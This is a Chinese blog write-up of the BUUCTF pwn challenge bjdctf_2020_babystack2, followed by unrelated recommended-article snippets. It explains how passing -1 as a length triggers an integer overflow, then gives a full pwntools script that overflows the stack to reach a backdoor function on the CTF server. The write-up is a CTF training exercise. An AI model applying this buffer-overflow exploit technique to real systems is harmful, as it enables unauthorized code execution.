[BUUCTF]PWN——bjdctf_2020_babystack2

最新推荐文章于 2026-06-21 09:53:41 发布
原创 最新推荐文章于 2026-06-21 09:53:41 发布 · 1.3k 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文探讨了在BJDCTF_2020_babystack2挑战中,通过利用一个整数溢出漏洞,远程执行代码的过程。作者详细解释了如何通过IDA工具定位后门函数,设计payload,并使用frompwn库进行远程交互。

bjdctf_2020_babystack2

64位,开启NX保护。
在这里插入图片描述
运行一下。
在这里插入图片描述
用IDA打开。找到了后门函数。backdoor=0x400726
在这里插入图片描述
在这里插入图片描述
查看main函数
读入数据的大小由我们输入的参数nbytes控制
nbytes参数的类型 是 size_t,它是一个无符号整型。
但是第7行又将它转换成了有符号的整型,存在整数溢出漏洞(即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,从而造成溢出,常用-1来造成溢出)
在这里插入图片描述

from pwn import *

r=remote('node3.buuoj.cn',29186)
backdoor=0x400726

r.recv()
r.sendline('-1')
r.recv()

payload='a'*(0x10+8)+p64(backdoor)
r.sendline(payload)

r.interactive()

在这里插入图片描述

OpenAI 兼容的 Responses API 网关,让 Codex、CLI 工具和开发者 Agent 接入任意模型
06-02
OpenAI 兼容的 Responses API 网关,让 Codex、CLI 工具和开发者 Agent 接入任意模型。GodeX 让使用 OpenAI Responses API 的客户端,可以通过一个本地网关调用 DeepSeek、Xiaomi、MiniMax、智谱等只提供 Chat Completions API模型提供商。OpenAI 兼容的 POST /v1/responses,支持同步和流式响应。GET /v1/models 暴露模型别名,让客户端使用稳定模型名,GodeX 负责路由到 provider/model。内置 DeepSeek、Xiaomi、MiniMax、智谱桥接 provider。基于 provider capability 规划请求参数、工具、tool_choice、结构化输出、推理和流式 usage。支持 previous_response_id 会话链,可使用内存或 SQLite。Trace 记录 provider request、provider response、stream event、usage 和 error。基于 Bun 运行时、TypeScript 源码,并通过 release 产出多平台原生二进制。
异步与事务型 RFC 资源判定全景图:把 ABAP aRFC、tRFC 的资源检查机制讲透
2007 年 ~ 2025 年,深耕 SAP 技术 18 年
07-30 1504
摘要:SAP异步RFC资源判定机制包含本地检查(Local Check)和详细检查(Detailed Check)两个阶段。本地检查评估通信通道和异步响应缓冲空间等基本资源,详细检查则深入分析工作进程、队列容量等系统状态。该机制优先保障系统稳定性而非吞吐量,特别适用于S/4HANA、Gateway等高并发场景。开发人员可通过TH_ARFC_LOCAL_RESOURCES函数主动检查资源状况,避免因盲目发送RFC请求导致系统拥塞。理解这一分层检查机制对设计稳定高效的并行处理框架至关重要。
Codex桌面版 + DeepSeekAPI接入教程|无需Codex账号,支持国内模型
m0_69960929的博客
05-27 2万+
最近发现了一个很实用的AI编码辅助工具组合:Codex桌面版 + DeepSeekAPI模式。 不需要Codex账号,也能实现代码补全、Agent式交互,而且支持国内模型,速度不错。 本文记录完整配置过程,供有需要的朋友参考。
全网最详细的 Codex 接入 DeepSeek 教程来了!
2601_96010993的博客
05-27 5711
获取 DeepSeek API Key,首先打开 DeepSeek 开放平台:https://www.deepseek.com/启动 Codex++,发送简单指令测试,正常回复即表示接入国产模型 DeepSeek 成功,Codex 插件功能也可正常使用。打开 Codex++ 管理工具,进入供应商配置,添加供应商,这里供应商我们选择的是DeepSeek。,我们会继续整理AI智能体,AI工作流和实用教程,帮你少走弯路,把AI真正用到每天的工作里。注:API Key 只显示一次,立即复制保存,丢失需重建。
Codex 桌面版接入 DeepSeek V4:本地桥接版配置指南
Senoh的博客
05-14 2万+
本文介绍如何将Codex编程工具的前端工作流与DeepSeek V4的高性价比模型能力相结合。由于两者API接口不兼容(Codex使用Responses APIDeepSeek采用Chat Completions API),直接对接会导致请求失败。解决方案是在本地搭建轻量桥接服务,将Codex的请求转换为DeepSeek兼容格式,再反向转换响应数据。文章详细说明了环境准备、服务部署、配置文件修改等步骤,通过本地代理实现无缝对接,既保留Codex的功能体验,又能利用DeepSeek模型优势。
几分钟Codex如何接入国产模型 DeepSeek-v4-pro 保姆级教程
2201_75517551的博客
05-25 5630
Node.js— 环境基础— 模型调用凭证,去 platform.deepseek.com 免费注册获取CCX— 中转服务,把 CodexAPI 请求转发到 DeepSeekCC-Switch— 切换工具,方便在多个 API 配置间切换Codex— 编辑器本体,用 API 登录方式连上 CCX配置完成后,Codex 就能用上国产模型了,无需 ChatGPT 账号,也无需任何魔法网络环境。
Codex vs DeepSeek:哪个更适合你的代码生成需求?实测对比与选型指南
weixin_29063979的博客
02-17 1006
本文深入对比了CodexDeepSeek-Coder两大代码生成模型的核心差异。Codex基于通用模型进行领域微调,擅长IDE集成与代码结构完整性;而DeepSeek采用参数门控的MoE架构,以开源、低成本和高推理效率见长。文章通过实测数据、成本分析和应用场景拆解,为开发者提供了清晰的选型指南,帮助根据团队规模、技术栈和预算选择最合适的工具。
核弹级技术革命——搭配deepseek-r1满血版的腾讯云ai助手(codex)仅用14天独立开发出适配ARM架构的微内核操作系统!
m0_73464010的博客
02-26 3031
当代码生成速度提升600%、缺陷率下降75%成为现实,全球开发者正在见证AI生产力的核爆时刻!DeepSeek ProMax AI 代码引擎与腾讯云CodeX双剑合璧,以实测数据重新定义智能编程标准。实测提升CRUD开发效率300%,自动生成单元测试覆盖率提升30%「CodeX的云安全检测,帮我们拦截了价值千万的潜在攻击」深度集成腾讯云200+服务API,一键生成云资源编排代码。智能运维模块预测准确率91.5%,提前阻断83%线上故障。√ 成本优化引擎:自动识别并优化30%云资源浪费。
Codex桌面版接入DeepSeek-V4
热门推荐
2503_91008971的博客
05-10 5万+
免降级、免破解,通过本地代理让 Codex 最新桌面版与 DeepSeek API 稳定协作。
教程:在 Windows WSL 中为 Codex 接入 DeepSeek V4 Pro
kijio的博客
05-02 1万+
本文将带你实现在 Windows WSL (Windows Subsystem for Linux) 环境下,将这款来自 OpenAI 的强大助手与 DeepSeek V4 Pro 强强联手,打造最强本地开发环境。
国产模型(ds、glm、kimi)接入新版codex全流程(CLIProxyAPI使用)
Eurus445的博客
04-16 2万+
这段时间试图跑通windows+新版codex+deepseek的环境,用来部署基于websocket的项目,但是发现网上给codex接国产模型的教程要么是codex v0.8版本以下才能用,要么没写清楚codex默认模型调用逻辑,搞得我这个agent小白不停踩坑,所以我在这里决定把这段时间的经历作为教程整理出来,大家按需取用。这些东西说简单,那也不难,但是对于刚入坑agent的小白+两年没敲代码的小登而言真的踩坑踩得满脚泥,希望这篇教程能给各位后来人解惑,一起学习。
如何用 MoonBridge 在 Responses APIChat Completions API 之间做一层转换,以及它到底能不能解决 Codex 接入第三方模型问题
2303_77333346的博客
05-15 901
本文探讨了使用MoonBridge解决Codex接入第三方模型时遇到的协议转换问题。作者发现,虽然MoonBridge能有效转换/v1/responses和/v1/chat/completions接口,但在处理Codexagent工具调用时仍存在挑战。通过测试DeepSeek和小米MiMo模型发现,真正的难点在于工具协议兼容性,而非简单的接口转换。DeepSeek因工具schema校验失败返回502错误,而小米虽能返回结果但输出质量不佳。文章指出MoonBridge解决了入口协议和模型路由问题,但无法自动
CodexDeepSeek协议不兼容?详解ResponsesChat API桥接方案
最新发布
weixin_30596023的博客
06-21 323
AI开发工具链中,OpenAI兼容性已成为事实标准,但不同厂商的API协议存在深层差异。Codex采用自定义的Responses协议,而DeepSeek等新模型严格遵循标准Chat Completions接口,二者在请求路径、字段语义、流式响应格式上存在结构性不匹配。这种协议鸿沟导致仅修改base_url必然失败,需通过协议转换网关实现字段映射、路径重写与事件格式适配。本地网关(如ccx)提供高可控性与低延迟,适合隐私敏感与性能关键场景;在线代理(如OpenRouter BYOK)则以零部署成本支持快速验
通过 CC Switch 本地路由让 Codex CLI 接入 DeepSeek 等第三方模型
lxttzlove的博客
06-17 766
本文介绍了如何通过CCSwitch本地路由将CodexCLI与DeepSeek等国内主流模型厂商对接。由于OpenAICodexCLI使用ResponsesAPI协议,而国内厂商普遍提供ChatCompletions接口,CCSwitch通过在本地完成协议转换来解决这一兼容性问题。操作步骤包括:1)添加供应商并填写APIKey;2)启用本地路由并接管Codex配置;3)重启Codex终端。文章还提供了常见问题排查方法,如404错误处理和模型加载问题。CCSwitch支持DeepSeek、Kimi等厂商的预
Codex-Bridge实现API协议双向转换
2601_95602870的博客
06-11 319
通过部署本地代理服务,可实现 OpenAI Responses APIChat Completions API 之间的双向协议转换,使 Codex 客户端能够无缝调用 DeepSeek 等使用 Chat Completions 协议的模型
CodexCodex安装+DeepSeek API接入;无需登录,手把手带你使用codex
AnChenliang_1002的博客
06-06 1647
好多人使用codex时都卡在验证码登录那一步,今天就来介绍一种方法,不需要登录ChatGPT的账号,自然也就不需要手机验证码了;接入DeepSeekapi,一样可以丝滑使用codex;记录从零开始安装使用codex以及DeepSeek API接入的整个过程。不需要登录openAI
DeepCodex-让codex完全接入Deepseek V4大模型
科技毒瘤君
05-19 592
都知道,codex的协议和deepseek的协议不一致,如果想让codex快捷的用上deepseek,确实是需要琢磨一下;但是最近,我发现一个不错的工具,可以让deepseek一键接入codex里面。直接在应用里面找到deepcodex,打开后,会让你输入 deepseekapi key,输入完成后,自动的打开codex!DeepCodex-让codex完全接入Deepseek V4大模型。DeepCodex-让codex完全接入Deepseek V4大模型。项目地址在文末,可以快速进行下载;
Claude Code / Cursor / Codex 国内 API 接入:4 家平台兼容性实测
2501_94459390的博客
04-30 1262
Claude Code、Cursor、Codex、Cline 是目前比较主流的 AI 编程工具。国内使用时需要通过第三方 API 平台接入,本文实测了 4 家平台的兼容性和配置方法。数眼智能— API 聚合平台,同时覆盖商业模型(Claude/GPT/Gemini)和国产模型DeepSeek/通义千问),提供硅谷主线、CN2 专线、香港节点三个接入点。官网标注兼容 Claude Code、Codex、Cursor、Cline 等工具。硅基流动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值